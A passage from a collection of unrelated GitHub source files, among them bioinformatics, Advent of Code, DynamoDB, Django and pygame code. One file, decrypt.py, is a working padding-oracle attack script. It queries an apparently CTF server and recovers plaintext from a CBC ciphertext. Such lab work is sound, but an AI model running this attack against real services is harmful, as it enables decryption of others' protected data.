sum_nc_genome_noncod=0\n #Total of GC nucleotides in the whole genome that belongs to coding regions\n sum_GC_nc_cds=0\n #Total of GC nucleotides in the whole genome\n sum_GC_nc=0\n\n for i in range(1,len(genome_array)):\n output_csv_file.write(str(genome_array[i])+\"\\n\")\n if (checkCG(whole_genome[i])):\n sum_GC_nc=sum_GC_nc+1\n #Check if nucleotide is part of coding region\n #uORFs nucleotides adds +10 to genome_array and gene coding regions derived form cds file adds +1\n #So we get the remainder of division by 10\n if (genome_array[i]%10>0):\n sum_GC_nc_cds= sum_GC_nc_cds+1\n sum_nc_genome_cds=sum_nc_genome_cds+1\n elif (genome_array[i]%10>0):\n sum_nc_genome_cds=sum_nc_genome_cds+1\n\n return sum_nc_genome_cds, sum_GC_nc_cds, sum_GC_nc\n\n\ndef main():\n\n uORFs_file,cds_file,fasta_file,output_gct_file,output_csv_file =checkInputFiles()\n\n #Call function that reads data from 'cds' file, creating genome_array\n genome_size,genome_array = createGenomeArray(cds_file)\n\n #Call function to read whole genome from fasta file\n whole_genome=readWholeGenome(fasta_file)\n\n #Call function to calculate GC Content of uORfs\n sum_nc_GC_ORFs, sum_nc_GC_ORFs_cds, sum_nc_ORFs, sum_nc_ORFs_cds,sum_size_uorfs_noncod=uORFsFileGCCalc(uORFs_file,genome_array,output_gct_file)\n\n #Call function to calculate GC Content of whole genome\n sum_nc_genome_cds, sum_GC_nc_cds, sum_GC_nc=wholeGenomeGCCalc(output_csv_file,output_gct_file, whole_genome, genome_array)\n sum_nc_genome_noncod=genome_size-sum_nc_genome_cds\n sum_GC_nc_noncod=sum_GC_nc-sum_GC_nc_cds\n\n #Calculate number of ORFs nucleotides in non coding regions\n sum_nc_ORFs_noncod=sum_nc_ORFs-sum_nc_ORFs_cds\n \n #Print final summary\n printSaveFinalSummary(genome_size, sum_nc_genome_cds, sum_nc_genome_noncod, sum_GC_nc, sum_GC_nc_cds, sum_GC_nc_noncod, sum_nc_ORFs, sum_nc_GC_ORFs, sum_nc_ORFs_cds, \\\nsum_nc_GC_ORFs_cds, sum_nc_ORFs_noncod, output_gct_file)\n\n print(\"\\n\\n____________________________________________________________\")\n print(\"\\n\\nResults saved in: \"+str(output_gct_file.name)+\" e \"+str(output_csv_file.name)+\"\\n\")\n print(\"____________________________________________________________\\n\\n\\n\")\n\n uORFs_file.close()\n cds_file.close()\n output_csv_file.close()\n output_gct_file.close()\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"paulaluize/mitogenomes","sub_path":"GCContentuORfsCdsCirc.py","file_name":"GCContentuORfsCdsCirc.py","file_ext":"py","file_size_in_byte":19665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8324209012","text":"from dataclasses import dataclass, field\nimport logging\n\nTEST_INPUT = [\n 'FBFBBFFRLR',\n 'BFFFBBFRRR',\n 'FFFBBBFRRR',\n 'BBFFBBFRLL',\n]\n\nNUM_ROWS = 128\nNUM_COLS = 8\n\ndef divide_seats(string, inc_char, seats):\n offset = 0\n logging.debug(string)\n for char in string:\n seats /= 2\n logging.debug(char)\n if char == inc_char:\n offset += seats\n logging.debug(f' upper half: {offset}, +{seats}')\n else:\n logging.debug(f' lower half: {offset}, +0')\n return int(offset)\n\ndef parse_front_back(string, seats=128):\n return divide_seats(string, 'B', seats)\n\ndef parse_left_right(string, seats=8):\n return divide_seats(string, 'R', seats)\n\ndef decode_seat_code(string: str) -> 'Seat':\n row_code = string[:7]\n column_code = string[7:]\n return Seat(parse_front_back(row_code), parse_left_right(column_code))\n\n@dataclass(frozen=True)\nclass Seat:\n\n row: int\n column: int\n seat_id: int = field(init=False)\n\n def __post_init__(self):\n object.__setattr__(self, 'seat_id', (self.row * 8) + self.column)\n\n\ndef tests():\n print('Tests\\n-----\\n')\n results = [decode_seat_code(code) for code in TEST_INPUT]\n print(results)\n\ndef main():\n print('Main\\n----\\n')\n\n with open(\"input_1.txt\", 'r') as input_file:\n results = [decode_seat_code(code.strip()) for code in input_file.readlines()]\n\n print('Max seat ID: ', max(s.seat_id for s in results))\n \n all_seats = {Seat(row, column) for row in range(NUM_ROWS) for column in range(NUM_COLS)}\n missing_seats = all_seats.difference(results)\n results = sorted(missing_seats, key=lambda e: e.row)\n for r in results:\n print(r)\n\n\nif __name__ == '__main__':\n tests()\n print('')\n main()\n","repo_name":"rpw505/aoc_2020","sub_path":"day_05/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33190270487","text":"import numpy as np\n\nfrom chemtools.wrappers.molecule import Molecule\nfrom chemtools.utils.cube import UniformGrid\n\n\nhelp_cube = \"\"\"\ncubic grid used for evaluation and visualization.\nThis can be either a cube file with .cube extension, or a user-defined\ncubic grid specified by comma-separated spacing and extension values,\ne.g., 0.2,5.0 specifies 0.2 a.u. distance between grid points, and 5.0 a.u.\nextension on each side of molecule. [default=%(default)s]\n\"\"\"\n\n\ndef load_molecule_and_grid(fname, cube):\n \"\"\"Return instances of molecule and uniform cubic grid.\n\n Parameters\n ----------\n fname : str\n Path to wave-function file.\n cube : str\n Uniform cubic grid specifications.\n\n \"\"\"\n # load molecule\n mol = Molecule.from_file(fname)\n\n if cube.endswith(\".cube\"):\n # load & check cube file\n cube = UniformGrid.from_cube(cube)\n if np.allclose(mol.numbers, cube.numbers):\n raise ValueError(\"Atomic number in {0} & {1} should be the same!\".format(fname, cube))\n if np.allclose(mol.coordinates, cube.coordinates):\n raise ValueError(\n \"Atomic coordinates in {0} & {1} should be the same!\".format(cube.fname, cube.cube)\n )\n elif len(cube.split(\",\")) == 2:\n # make a cubic grid\n spacing, extension = [float(item) for item in cube.split(\",\")]\n cube = UniformGrid.from_molecule(mol, spacing=spacing, extension=extension, rotate=True)\n\n else:\n raise ValueError(\"Argument cube={0} is not recognized!\".format(cube))\n\n return mol, cube\n","repo_name":"theochem/chemtools","sub_path":"chemtools/scripts/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"32795615141","text":"def _compile_single(ctx):\n yasm_path = \"yasm \"\n args = []\n\n if ctx.attr.arch == \"x64\":\n args += [\"-felf64\", \"-D__x86_64__\", \"-DELF\"]\n else:\n args += [\"-felf\", \"-D__x86__\", \"-DELF\"]\n\n args += ctx.attr.defines\n\n include_paths = []\n include_paths += [\"-I./\" + e.path for e in ctx.files.includes]\n args += include_paths\n args += [ctx.file.src.path]\n args += [\"-o \", ctx.outputs.out.path]\n\n command = yasm_path + \" \".join(args)\n ctx.action(\n mnemonic = \"YasmCompile\",\n inputs = [ctx.file.src] + ctx.files.deps,\n outputs = [ctx.outputs.out],\n command = command,\n )\n\n return struct(files = set([ctx.outputs.out]))\n\n_yasm_compile_attrs = {\n \"src\": attr.label(allow_files = FileType([\".asm\"]),\n single_file = True),\n \"arch\": attr.string(default = \"x64\"),\n \"includes\": attr.label_list(allow_files = True),\n \"deps\": attr.label_list(allow_files = True),\n \"defines\": attr.string_list(),\n}\n\nyasm_compile = rule(\n _compile_single,\n attrs = _yasm_compile_attrs,\n outputs = {\n \"out\": \"%{name}.o\"\n }\n)\n\ndef yasm_library(name, arch=None, srcs=None, deps=[], includes=[], defines=[], visibility=None):\n yasm_objs = []\n for src in srcs:\n yasm_objs += [yasm_compile(name = src[:-4],\n arch = arch,\n src = src,\n deps = deps,\n includes = includes,\n defines = defines)]\n lablels = [e.label() for e in yasm_objs]\n native.cc_library(\n linkstatic = 1,\n name = name,\n visibility = visibility,\n srcs = lablels\n )\n \n\n\n","repo_name":"baranov1ch/squim","sub_path":"tools/build_rules/yasm.bzl","file_name":"yasm.bzl","file_ext":"bzl","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19882638668","text":"import subprocess\n\nif __name__ == \"__main__\":\n command = input(\"Introduceti comanda: \")\n command_list = []\n\n for c in command.split(\"|\"):\n command_list.append(filter(lambda c: c != \"\", c.split(\" \")))\n\n prev = subprocess.run(command_list[0], stdout=subprocess.PIPE)\n\n for c in command_list[1:]:\n prev = subprocess.run(c, input=prev.stdout, stdout=subprocess.PIPE)\n\n print(f'{prev.stdout.decode(\"utf-8\")}')\n","repo_name":"Eduard975/PP","sub_path":"Teme/Tema11/Problema2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31103900998","text":"# Print the following pattern for the given number of rows.\n# Assume N is always odd.\n# Note : There is space after every star.\n# Pattern for N = 7\n# *\n# * *\n# * * *\n# * * * *\n# * * *\n# * *\n# *\n\n\nn=int(input())\nn1=(n//2)+1\ni=1\nwhile i<=n1:\n spaces=i-1\n while spaces>=1:\n print(\" \",end=\"\")\n spaces-=1\n star=1\n while star<=i:\n print(\"* \",end=\"\")\n star +=1\n print()\n i=i+1\nn2=n//2\ni=1\nwhile i<=n2:\n spaces=n2-i\n while spaces>=1:\n print(\" \",end=\"\")\n spaces-=1\n star=n2-i+1\n while star>=1:\n print(\"* \",end=\"\")\n star-=1\n print()\n i=i+1\n","repo_name":"LORDFLACKO0087/Python-Codes","sub_path":"Coding Ninjas/Patterns 2/Arrow pattern.py","file_name":"Arrow pattern.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38821540585","text":"import boto3\nfrom botocore.exceptions import ClientError\nimport os\nimport json\nfrom decimal import Decimal\nfrom pprint import pprint\nfrom loguru import logger\n\ndynamodb = boto3.resource('dynamodb', endpoint_url=\"http://localhost:8000\")\n\n\ndef load_data(devices, dynamodb=None):\n devices_table = dynamodb.Table('Devices')\n # Loop through all the items and load each\n for device in devices:\n device_id = (device['device_id'])\n datacount = device['datacount']\n # Print device info\n print(\"Loading Devices Data:\", device_id, datacount)\n devices_table.put_item(Item=device)\n\n\ndef create_devices_table(dynamodb=None):\n dynamodb = boto3.resource(\n 'dynamodb', endpoint_url=\"http://localhost:8000\")\n # Table defination\n table = dynamodb.create_table(\n TableName='Devices',\n KeySchema=[\n {\n 'AttributeName': 'device_id',\n 'KeyType': 'HASH' # Partition key\n },\n {\n 'AttributeName': 'datacount',\n 'KeyType': 'RANGE' # Sort key\n }\n ],\n AttributeDefinitions=[\n {\n 'AttributeName': 'device_id',\n # AttributeType defines the data type. 'S' is string type and 'N' is number type\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'datacount',\n 'AttributeType': 'N'\n },\n ],\n ProvisionedThroughput={\n # ReadCapacityUnits set to 10 strongly consistent reads per second\n 'ReadCapacityUnits': 10,\n 'WriteCapacityUnits': 10 # WriteCapacityUnits set to 10 writes per second\n }\n )\n return table\n\n\ndef create_user_table():\n table_name = 'Users'\n params = {\n 'TableName': table_name,\n 'KeySchema': [\n {'AttributeName': 'partition_key', 'KeyType': 'HASH'},\n {'AttributeName': 'sort_key', 'KeyType': 'RANGE'}\n ],\n 'AttributeDefinitions': [\n {'AttributeName': 'partition_key', 'AttributeType': 'N'},\n {'AttributeName': 'sort_key', 'AttributeType': 'N'}\n ],\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 10,\n 'WriteCapcityUnits': 10\n },\n }\n table = dynamodb.create_table(**params)\n logger.info(f\"Creating table: {table_name}\")\n table.wait_until_exists()\n return table\n\n\ndef put_device(device_id, datacount, timestamp, temperature1, temperature2, temperature3, temperature4, temperature5, dynamodb=None):\n dynamodb = boto3.resource(\n 'dynamodb', endpoint_url=\"http://localhost:8000\")\n # Specify the table\n devices_table = dynamodb.Table('Devices')\n response = devices_table.put_item(\n # Data to be inserted\n Item={\n 'device_id': device_id,\n 'datacount': datacount,\n 'info': {\n 'info_timestamp': timestamp,\n 'temperature1': temperature1,\n 'temperature2': temperature2,\n 'temperature3': temperature3,\n 'temperature4': temperature4,\n 'temperature5': temperature5\n }\n }\n )\n return response\n\n\ndef get_device(device_id, datacount):\n # Specify the table to read from\n devices_table = dynamodb.Table('Devices')\n\n try:\n response = devices_table.get_item(\n Key={'device_id': device_id, 'datacount': datacount})\n except ClientError as e:\n print(e.response['Error']['Message'])\n else:\n return response['Item']\n\n\ndef scan_devices():\n dynamodb = boto3.resource(\n 'dynamodb', endpoint_url=\"http://localhost:8000\")\n # Specify the table to scan\n devices_table = dynamodb.Table('Devices')\n response = devices_table.scan()\n print(response)\n items = response['Items']\n while 'LastEvaluatedKey' in response:\n print(response['LastEvaluatedKey'])\n response = devices_table.scan(ExclusiveStartKey=response['LastEvaluatedKey'])\n items.extend(response['Items'])\n print(items)\n\n\nif __name__ == '__main__':\n # device_table = create_devices_table()\n # Print table status\n # print(\"Status:\", device_table.table_status)\n\n # with open(\"../data.json\") as json_file:\n # device_list = json.load(json_file, parse_float=Decimal)\n # load_data(device_list)\n\n # device_resp = put_device(\"10001\", 3, \"1612522800\",\n # \"23.74\", \"32.56\", \"12.43\", \"44.74\", \"12.74\")\n # print(\"Create item successful.\")\n # # Print response\n # pprint(device_resp)\n\n device = get_device(\"10001\", 3, )\n if device:\n print(\"Get Device Data Done:\")\n # Print the data read\n print(device)\n\n # scan_devices()\n\n","repo_name":"bwlee13/ProjectInit","sub_path":"utils/db_utils.py","file_name":"db_utils.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27212945163","text":"from django.conf import settings\nfrom django.core.management import call_command\nfrom django.db.models import loading\nfrom django import test\n\n\nclass TestCase(test.TestCase):\n apps = ('flash.tests',)\n tables_created = False\n\n def _pre_setup(self):\n cls = TestCase\n if not cls.tables_created:\n # Add the models to the db.\n cls._original_installed_apps = list(settings.INSTALLED_APPS)\n for app in cls.apps:\n if isinstance(settings.INSTALLED_APPS, tuple):\n settings.INSTALLED_APPS = list(settings.INSTALLED_APPS)\n settings.INSTALLED_APPS.append(app)\n loading.cache.loaded = False\n call_command('syncdb', interactive=False, verbosity=0)\n TestCase.tables_created = True\n\n # Call the original method that does the fixtures etc.\n super(TestCase, self)._pre_setup()\n\n def _post_teardown(self):\n # Call the original method.\n super(TestCase, self)._post_teardown()\n cls = TestCase\n # Restore the settings.\n settings.INSTALLED_APPS = cls._original_installed_apps\n loading.cache.loaded = False\n","repo_name":"HackerEarth/django-flash","sub_path":"flash/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"25407513960","text":"from model import Compra, Cartao, CompraCredito\nfrom datetime import datetime, date\n\nvisa = Cartao('1111 1111 1111 1111', date(2031, 1, 31), '321', 1000.0, 'Steve Rogers')\n\ncompra_farmacia = Compra(100.0, datetime(2023, 1, 1, 10, 0, 0), 'Farmácia Popular', 'Saúde', visa)\ncompra_restaurante = Compra(89.9, datetime(2023, 1, 2, 12, 15, 0), 'Burguer King', 'Lazer', visa)\ncompra_supermercado = Compra(475.5, datetime(2023, 2, 3, 7, 5, 5), 'Carrefour', 'Alimentação', visa)\n\nprint(compra_farmacia)\nprint(compra_restaurante)\nprint(compra_supermercado)\nprint()\n\ncompra_amazon = CompraCredito(1000.0, datetime(2023, 2, 15, 19, 46, 17), 'Amazon', 'Casa', visa, 10)\nprint(f'Compra a crédito: {compra_amazon.valor} em {compra_amazon.quantidade_parcelas}x de {compra_amazon.valor_parcela}')\nprint()\n\nfatura = [compra_farmacia, compra_restaurante, compra_supermercado, compra_amazon]\ntotal = 0\nfor compra in fatura:\n total += compra.valor\n\nprint(f'O total da fatura é: {total}')\n","repo_name":"ThiagoAndrad/levelup-byte-card-python","sub_path":"teste_compra.py","file_name":"teste_compra.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38158767674","text":"import pygame, random\nfrom PIL import Image\n\n\n# функция создания пазлов\ndef create_puzzles(num, width, height):\n rows = num\n cols = num\n num_cells = rows * cols\n\n cell_width = width // rows\n cell_height = height // cols\n\n cells = []\n rand_indexes = list(range(0, num_cells))\n\n for i in range(num_cells):\n x = (i % rows) * cell_width\n y = (i // cols) * cell_height\n rect = pygame.Rect(x, y, cell_width, cell_height)\n rand_pos = random.choice(rand_indexes)\n rand_indexes.remove(rand_pos)\n cells.append({'rect': rect, 'border': (255, 255, 255), 'order': i, 'pos': rand_pos})\n return [cells, cell_width, cell_height]\n\n\n# функция создания фона для финального экрана\ndef converting(image):\n im_final = image.convert(\"L\")\n im_final.save('final.jpg')\n bg_final = pygame.image.load('final.jpg')\n return bg_final\n\n\n# функция изменения громкости\ndef change_volume(flag, volume):\n if flag:\n if 0 <= volume < 10:\n volume += 1\n pygame.mixer.music.set_volume(0.1 * volume)\n return volume\n elif volume == 10:\n return volume\n else:\n if 0 < volume <= 10:\n volume -= 1\n pygame.mixer.music.set_volume(0.1 * volume)\n return volume\n elif volume == 0:\n return volume\n","repo_name":"Scut1er/Ultimate-puzzle","sub_path":"defs.py","file_name":"defs.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31791274117","text":"import numpy as np\nimport pytest\nfrom matplotlib import pyplot as plt\nfrom matplotlib.axes import Axes\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.preprocessing import label_binarize\nfrom sklearn.svm import SVC\n\nfrom ml_tooling import Model\nfrom ml_tooling.data import load_demo_dataset\nfrom ml_tooling.result import Result\nfrom ml_tooling.utils import VizError\n\n\nclass TestPRCurve:\n @pytest.fixture(scope=\"class\")\n def classifier_result(self) -> Result:\n \"\"\"Setup a classiifer Result\"\"\"\n dataset = load_demo_dataset(\"iris\")\n model = Model(LogisticRegression())\n return model.score_estimator(dataset)\n\n @pytest.fixture(scope=\"class\")\n def ax(self, classifier_result: Result) -> Axes:\n \"\"\"Setup a PR Curve plot\"\"\"\n yield classifier_result.plot.precision_recall_curve()\n plt.close()\n\n def test_plots_can_be_given_an_ax(self, classifier_result: Result):\n \"\"\"Expect a plot to be able to be passed an existing axis and plot on that\"\"\"\n fig, ax = plt.subplots()\n test_ax = classifier_result.plot.precision_recall_curve(ax=ax)\n assert ax == test_ax\n plt.close()\n\n def test_has_the_correct_title(self, ax: Axes):\n \"\"\"Expect the title to reflect the estimator used\"\"\"\n assert ax.title.get_text() == \"Precision-Recall - LogisticRegression\"\n\n def test_has_the_correct_ylabel(self, ax: Axes):\n \"\"\"Expect the plot to have the correct y label\"\"\"\n assert ax.get_ylabel() == \"Precision\"\n\n def test_has_the_correct_xlabel(self, ax: Axes):\n \"\"\"Expect the plot to have the correct x label\"\"\"\n assert ax.get_xlabel() == \"Recall\"\n\n @pytest.mark.parametrize(\"class_index\", [0, 1, 2])\n def test_pr_curve_have_correct_data(\n self, ax: Axes, classifier_result: Result, class_index\n ):\n \"\"\"Expect the pr curve to have the correct data\"\"\"\n x = classifier_result.plot._data.test_x\n y_true = label_binarize(classifier_result.plot._data.test_y, classes=[0, 1, 2])[\n :, class_index\n ]\n y_proba = classifier_result.estimator.predict_proba(x)[:, class_index]\n\n precision, recall, _ = precision_recall_curve(y_true, y_proba)\n\n assert np.all(recall == ax.lines[class_index].get_xdata())\n assert np.all(precision == ax.lines[class_index].get_ydata())\n plt.close()\n\n def test_pr_curve_fails_correctly_without_predict_proba(self):\n \"\"\"\n Expect that the plot will raise an exception if the estimator\n does not have a predict_proba method\n \"\"\"\n dataset = load_demo_dataset(\"iris\")\n svc = Model(SVC(gamma=\"scale\"))\n result = svc.score_estimator(dataset)\n with pytest.raises(VizError):\n result.plot.precision_recall_curve()\n plt.close()\n\n def test_fails_if_wrong_number_of_labels_passed(self, classifier_result: Result):\n \"\"\"\n Expect the plot to raise if a different number of labels are passed, than there are\n classes in the data\n \"\"\"\n with pytest.raises(VizError):\n classifier_result.plot.precision_recall_curve(labels=[\"one\"])\n","repo_name":"andersbogsnes/ml_tooling","sub_path":"tests/test_visualizations/test_precision_recall_curve.py","file_name":"test_precision_recall_curve.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"17763583101","text":"import socket\nimport time\n\nhost = \"192.168.2.83\"\n\nport = 26151\n\ninvalid = 'invalid padding\\n'\n\ndata = \"5468697320697320616e204956343536069242ad5ac3e289582b09ff2d30032b0e72a2004dc6d37181448f0327a2a3f3fe3280b99951c832ca8d08940716d226af1a2edddadfdbe92a5933f4d869c714e53842a369eb89a44ae1159b3b73f3d3\" ## the cipher we want to decrypt, copy from CTF server terminal\n\n\nblock1 = data[0:32]\nblock2 = data[32:64]\nblock3 = data[64:96]\nblock4 = data[96:128]\nblock5 = data[128:160]\nblock6 = data[160:192]\n\ndef attack_blocks(block1, block2):\n c1 = block1\n c2 = block2\n res = b\"\"\n index = 30\n plain_padding = 1\n Is = []\n for _ in range(16):\n time.sleep(5)\n paddings = [hex(plain_padding ^ I)[2:] for I in Is]\n padding_str = \"\"\n\n for I in Is:\n p = hex(plain_padding ^ I)[2:]\n if len(p) == 1:\n p = '0' + p\n padding_str += p\n\n for i in range(256):\n b = hex(i)[2:]\n if len(b) == 1:\n b = \"0\" + b\n\n c1_ = c1[ : index] + b + padding_str\n print(\"current cipher: \", c1_)\n secret_text = c1_ + c2 + \" \"\n\n s = socket.socket()\n s.connect((host, port))\n s.sendall(secret_text.encode())\n s.shutdown(socket.SHUT_WR)\n\n fragments = []\n while True:\n chunk = s.recv(100)\n if not chunk:\n break\n fragments.append(chunk.decode('utf-8'))\n result = \"\".join(fragments)\n \n s.close()\n\n if result[-16:] != invalid:\n if b == c1[index : index + 2] and plain_padding == 1:\n continue\n I = int(b, 16) ^ plain_padding ##\n Is = [I] + Is\n plain = hex(int(c1[index:index + 2], 16) ^ I)[2:] ##\n if len(plain) == 1:\n plain = '0' + plain\n bytes_obj = bytes.fromhex(plain)\n res = bytes_obj + res\n plain_padding += 1\n index -= 2\n break\n print(\"current block has message: \", res)\n return res\n\n\n\nplain_5 = attack_blocks(block5, block6)\ntime.sleep(5)\nplain_4 = attack_blocks(block4, block5)\ntime.sleep(5)\nplain_3 = attack_blocks(block3, block4)\ntime.sleep(5)\nplain_2 = attack_blocks(block2, block3)\ntime.sleep(5)\nplain_1 = attack_blocks(block1, block2)\n\nprint(\"The plain text is \", plain_1 + plain_2 + plain_3 + plain_4 + plain_5)\n","repo_name":"biankaiwen111/padding_oracles","sub_path":"decrypt.py","file_name":"decrypt.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18229130641","text":"from typing import List\nimport itertools\n\n\nclass Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n\n if not digits:\n return None\n\n phone = {'2': ['a', 'b', 'c'],\n '3': ['d', 'e', 'f'],\n '4': ['g', 'h', 'i'],\n '5': ['j', 'k', 'l'],\n '6': ['m', 'n', 'o'],\n '7': ['p', 'q', 'r', 's'],\n '8': ['t', 'u', 'v'],\n '9': ['w', 'x', 'y', 'z']}\n\n\n def divideAndConquer(number):\n\n count_of_digits = len(number)\n\n mid = int(count_of_digits/2)\n\n if mid == 0:\n return phone.get(number[0])\n\n list1 = divideAndConquer(number[0:mid])\n list2 = divideAndConquer(number[mid:])\n\n combo = [''.join(tuple) for tuple in (list(itertools.product(list1,list2)))]\n return combo\n\n return divideAndConquer(digits)\n\n\ndigits = '243'\ns = Solution()\nprint(s.letterCombinations(digits))\n","repo_name":"jayati-naik/Leetcode-Recursion-II","sub_path":"LetterCombinationsD&C.py","file_name":"LetterCombinationsD&C.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13105584486","text":"from django.conf import settings\nfrom django.shortcuts import render\n\nfrom .forms import RegModelForm, ContactForm\nfrom .models import Registrado\n\n# Create your views here.\ndef home(request):\n titulo = \"Welcome!\"\n if request.user.is_authenticated:\n titulo = \"Welcome %s\" %(request.user)\n form = RegModelForm(request.POST or None)\n \n context = {\n \"titulo\": titulo,\n \"form\": form,\n }\n \n if form.is_valid():\n instance = form.save(commit=False)\n nombre = form.cleaned_data.get(\"nombre\")\n email = form.cleaned_data.get(\"email\")\n if not instance.nombre:\n instance.nombre = \"PERSONA\"\n instance.save()\n \n context = {\n \"titulo\": \"Gracias %s!\" %(nombre)\n }\n\n if not nombre:\n context = {\n \"titulo\": \"Gracias %s!\" %(email)\n }\n\n print (instance)\n print (instance.timestamp)\n\n if request.user.is_authenticated and request.user.is_staff:\n queryset = Registrado.objects.all().order_by('-timestamp') \n context = {\n \"queryset\": queryset,\n }\n return render(request, \"home.html\", context)\n\ndef contact(request):\n titulo = \"Contacto\"\n form = ContactForm(request.POST or None)\n if form.is_valid():\n for key in form.cleaned_data:\n print (key)\n print (form.cleaned_data.get(key))\n\n context = {\n \"form\": form,\n \"titulo\": \"Contacto\",\n }\n return render(request, \"forms.html\", context)","repo_name":"lnpereyra/djangofirstapp","sub_path":"src/boletin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13141286226","text":"from django.db import models\n\n# Create your models here.\n\nclass Author(models.Model):\n name = models.CharField('Имя автора', max_length= 250)\n surname = models.CharField('Фамилия автора', max_length=250)\n\n def __str__(self):\n return self.name\n\nclass Book(models.Model):\n author = models.ForeignKey(Author)\n book_name = models.CharField('Название книги', max_length=250)\n release_date = models.DateField('Дата выпуска', )\n\n def __str__(self):\n return self.book_name\n\nclass Comment(models.Model):\n comments_link_user = models.ForeignKey('User')\n comments_link_author = models.ForeignKey(Author, blank= True,null=True)\n comments_link_book = models.ForeignKey(Book, blank=True, null=True)\n comment_text = models.TextField('текст комментария', max_length=250)\n\nclass User (models.Model):\n name = models.CharField('Имя автора', max_length=250)\n surname = models.CharField('фамилия автора', max_length=250)\n\n\n","repo_name":"sergeyrudov/library","sub_path":"Books/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20814575783","text":"from app.domain import List, Item\nfrom app.infrastructure.repositories import ListRepository\nfrom app.error import Error\nfrom result import Ok, Result\n\n\nclass List:\n def __init__(self):\n self.list_repository = ListRepository()\n\n def find(self, list_id: str) -> Result[List, Error]:\n list_result = self.list_repository.find_by_id(list_id)\n return list_result\n\n def create_item(\n self,\n text: str,\n list_id: str,\n ) -> Result[Item, Error]:\n # find the existing list\n list_result = self.list_repository.find_by_id(list_id)\n\n # if list was not found, return error\n if list_result.is_err():\n return list_result\n\n # pull out the list domain object\n list = list_result.ok()\n\n # create the new item\n item = Item(text=text)\n\n # add the item to the list\n list.add_item(item)\n\n # save the aggregate\n save_result = self.list_repository.save(list)\n\n if save_result.is_err():\n return save_result\n\n return Ok(item)\n","repo_name":"MathyouMB/django-ddd-service-template","sub_path":"app/application/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"13128376856","text":"import tkinter as tk\r\nfrom PIL import Image, ImageTk, EpsImagePlugin\r\nimport pyautogui\r\nfrom app.cv import processing\r\n\r\nclass Drawing(tk.Tk):\r\n def __init__(self):\r\n tk.Tk.__init__(self)\r\n self.x = self.y = 0\r\n self.canvas = tk.Canvas(self, width=1920, height=1080, cursor=\"cross\")\r\n self.canvas.pack(side=\"top\", fill=\"both\", expand=True)\r\n self.canvas.bind(\"\", self.on_button_press)\r\n self.canvas.bind(\"\", self.on_button3_press)\r\n self.canvas.bind(\"\", self.on_move)\r\n\r\n self.line = None\r\n\r\n self.start_x = None\r\n self.start_y = None\r\n\r\n self.old_x = None\r\n self.old_y = None\r\n\r\n self.first_x = None\r\n self.first_y = None\r\n\r\n self._draw_image()\r\n\r\n def _draw_image(self):\r\n self.im = Image.open('screenshot.jpg')\r\n self.tk_im = ImageTk.PhotoImage(self.im)\r\n self.canvas.create_image(0, 0, anchor=\"nw\", image=self.tk_im)\r\n\r\n def on_button_press(self, event):\r\n self.old_x = self.start_x\r\n self.old_y = self.start_y\r\n self.start_x = event.x\r\n self.start_y = event.y\r\n if self.old_x is not None:\r\n if abs(event.x - self.first_x) <= 10 and abs(event.y - self.first_y) <= 10:\r\n self.canvas.create_line(self.old_x, self.old_y, self.first_x, self.first_y, fill='red', tag=\"lines\")\r\n self.line = None\r\n self.start_x = None\r\n self.start_y = None\r\n self.old_x = None\r\n self.old_y = None\r\n self.first_x = None\r\n self.first_y = None\r\n img = Image.open('screenshot.jpg')\r\n EpsImagePlugin.gs_windows_binary = r'C:\\Program Files\\gs\\gs9.56.1\\bin\\gswin64c'\r\n self.canvas.postscript(file='polygon' + '.eps')\r\n img = Image.open('polygon' + '.eps')\r\n img.save('polygon' + '.png', 'png')\r\n img = Image.open('polygon' + '.png')\r\n processing(img)\r\n else:\r\n self.canvas.create_line(self.old_x, self.old_y, event.x, event.y, fill='red', tag=\"lines\")\r\n\r\n else:\r\n self.first_x = self.start_x\r\n self.first_y = self.start_y\r\n\r\n if not self.line:\r\n self.line = self.canvas.create_line(self.start_x, self.start_y, 